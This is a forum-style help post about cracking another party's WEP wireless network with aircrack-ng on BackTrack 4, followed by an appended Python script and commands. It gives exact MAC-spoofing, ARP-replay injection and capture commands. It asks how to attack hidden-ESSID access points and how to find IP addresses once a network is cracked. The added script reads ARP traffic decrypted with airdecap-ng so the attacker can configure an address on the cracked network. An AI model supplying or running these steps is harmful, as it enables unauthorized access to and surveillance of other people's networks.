Hi, I first tried this whole Linux/aircrack thing yesterday, and now I've been at it the whole day today..
I've got a little problem here getting the injection to work.
I am using the latest BackTrack (4) and I'll describe how far I've come:
00:00:00:00:00:00 = my original MAC
00:11:11:11:11:11 = BSSID of the AP to crack
00:22:22:22:22:22 = MAC of a client connected to the AP to crack
AP2crack = ESSID of the AP to crack
eth1 = my wireless adapter
[shell1]rmmod ipw2200
modprobe ipw2200 rtap_iface=1 channel=7
iwconfig eth1 ap 00:11:11:11:11:11 essid AP2crack channel 7 key s:fakekey mode managed
[shell2]airodump-ng --channel 7 --bssid 00:11:11:11:11:11 -w dump rtap0
[shell3]aireplay-ng --arpreplay -b 00:11:11:11:11:11 -e AP2crack -h 00:22:22:22:22:22 -i rtap0 eth1
[shell1]iwconfig eth1 ap 00:11:11:11:11:11 essid AP2crack channel 7 key s:fakekey mode managed
NOTES:
- I am running the commands in exactly this order.
- EVERY time I start aireplay [shell3], eth1 immediately disconnects from the associated AP2crack and I have to run iwconfig again (while NOT stopping aireplay!), see the last shell1. Then aireplay continues..
- I HAVE TO add the ESSID to the iwconfig AND(!) the aireplay command. If these two don't match, aireplay ends with the error -> there is no matching BSSID!
- I HAVE TO add the CHANNEL OF THE AP2CRACK to the modprobe command [shell1], otherwise aireplay will quit with the error:
Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 0
rtap0 is on channel 0, but the AP uses channel 7
- Apart from that, this error is persistent:
The interface MAC (00:00:00:00:00:00) doesn't match the specified MAC (-h).
ifconfig eth1 hw ether 00:22:22:22:22:22
- I cannot change my MAC address with
ifconfig eth1 hw ether 00:xx:xx:xx:xx:xx
to match the MAC of the AP2crack client. Every time I do, it's still the same error:
interface MAC (00:00:00:00:00:00, still the original one) doesn't match..

PROBLEMS:
1) aireplay is running, gathering packets, after some minutes getting some ACKs and some ARPs,
then injecting (up to >300 000), BUT airodump [shell2] is not increasing #data (just the 'normal' data increase once in a while from the client)! PWR ~-70 / RXQ ~70.
why?
2) airodump via rtap0 is A LOT slower than via eth1, sometimes getting just 10 beacons a minute while airodump on eth1 is running at hundreds of beacons a minute.
Also, airodump on rtap0 is (sometimes) getting beacons but not showing a single #data and not showing the STATIONS.
why?
3) Question: can I have different rtaps so I can have one for every channel I need, so I don't always have to run rmmod ipw2200 and modprobe every time when attacking APs on different channels? Like I said, aireplay is listening on channel 0 if I don't give rtap0 the right one for the AP.
4) Or can I point aireplay to listen for beacons on the specific channel of the AP2crack so I don't have to change the rtap channel every time?
5) If I have an AP without an ESSID (like <length 8>), how can I start an aireplay on that one? Because, like I said before, I have to enter both BSSID and ESSID for aireplay to work. I also tried giving it a dummy name (the same in iwconfig and aireplay) but that didn't work (error: there is no matching essid).
6) How can I discover the IP of a connected STATION or the default IP of the AP, so I can set the IP when the cracked AP is not using DHCP?
I have been trying the whole day now to get this far,

so I would appreciate it if someone could point me in the right direction.
thx!
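Question 6 (finding the IP of a station or of the AP once the key is known) is usually answered by reading the addresses straight out of the ARP traffic that aireplay-ng was replaying anyway. The following is an added example, not part of the original post and not code from the aircrack-ng suite: a small reader for a classic pcap file that pulls every ARP sender and responder into an IP-to-MAC table and flags the address the stations keep asking for as the likely gateway. It assumes the airodump-ng capture has first been decrypted with airdecap-ng, which by default drops the 802.11 header and writes Ethernet frames; the file name dump-01-dec.cap, the 192.168.1.x addresses and the embedded sample capture are constructed for the demonstration (the sample router answers from the BSSID, which real routers do not always do).

```python
"""Passively learn IP addresses on a WEP network from its ARP traffic.

Added example, not from the original post. Input is an Ethernet-framed pcap,
e.g. the dump-01-dec.cap that airdecap-ng writes (the filename is assumed).
"""
import struct
from collections import Counter

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def _mac(b):
    return ":".join("%02x" % x for x in b)


def _ip(b):
    return ".".join(str(x) for x in b)


def parse_pcap(data):
    """Yield raw link-layer frames from a classic pcap; Ethernet (DLT 1) only."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == 0xA1B2C3D4:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype != 1:
        raise ValueError("expected Ethernet frames; decrypt with airdecap-ng first")
    off = 24
    while off + 16 <= len(data):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def learn_hosts(data):
    """Return (ip -> mac table, Counter of IPs asked for in ARP requests)."""
    hosts = {}
    asked_for = Counter()
    for frame in parse_pcap(data):
        if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
            continue  # runt frame or not ARP
        htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
        if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
            continue  # not Ethernet/IPv4 ARP
        sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
        hosts[_ip(spa)] = _mac(sha)  # sender fields are authoritative in both directions
        if op == ARP_REPLY and any(tha):
            hosts[_ip(tpa)] = _mac(tha)  # the station that asked
        elif op == ARP_REQUEST and spa != tpa:  # skip gratuitous self-announcements
            asked_for[_ip(tpa)] += 1
    return hosts, asked_for


def likely_gateway(asked_for):
    """The address everyone keeps asking for is almost always the router/AP."""
    return asked_for.most_common(1)[0][0] if asked_for else None


def _arp(op, sha, spa, tha, tpa, dst=b"\xff" * 6):
    """Build one Ethernet/ARP frame (only used to construct the sample pcap)."""
    eth = dst + sha + struct.pack("!H", ETHERTYPE_ARP)
    return eth + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op) + sha + spa + tha + tpa


def build_pcap(frames):
    """Wrap frames in a little-endian classic pcap header with DLT 1 (Ethernet)."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


# Constructed sample capture using the MACs from the post; IPs are made up.
AP_MAC = bytes.fromhex("001111111111")
CLIENT_MAC = bytes.fromhex("002222222222")
GW_IP, CLIENT_IP, ZERO_MAC = bytes([192, 168, 1, 1]), bytes([192, 168, 1, 100]), b"\x00" * 6
SAMPLE_PCAP = build_pcap([
    _arp(ARP_REQUEST, CLIENT_MAC, CLIENT_IP, ZERO_MAC, GW_IP),          # who has .1?
    _arp(ARP_REPLY, AP_MAC, GW_IP, CLIENT_MAC, CLIENT_IP, dst=CLIENT_MAC),
    _arp(ARP_REQUEST, CLIENT_MAC, CLIENT_IP, ZERO_MAC, GW_IP),          # asked again
    _arp(ARP_REQUEST, CLIENT_MAC, CLIENT_IP, ZERO_MAC, CLIENT_IP),      # gratuitous, ignored
    b"\x00" * 20,                                                       # runt frame, skipped
])

if __name__ == "__main__":
    data = SAMPLE_PCAP  # real use: open("dump-01-dec.cap", "rb").read()
    hosts, asked = learn_hosts(data)
    for ip, mac in sorted(hosts.items()):
        print(ip, mac)
    print("likely gateway:", likely_gateway(asked))
```

In practice the capture is decrypted first with `airdecap-ng -w <hexkey> -b 00:11:11:11:11:11 dump-01.cap`, and the script is pointed at the resulting dump-01-dec.cap. With the ARP table in hand you can pick an unused address in the same /24 and set the gateway by hand when the AP hands out no DHCP leases.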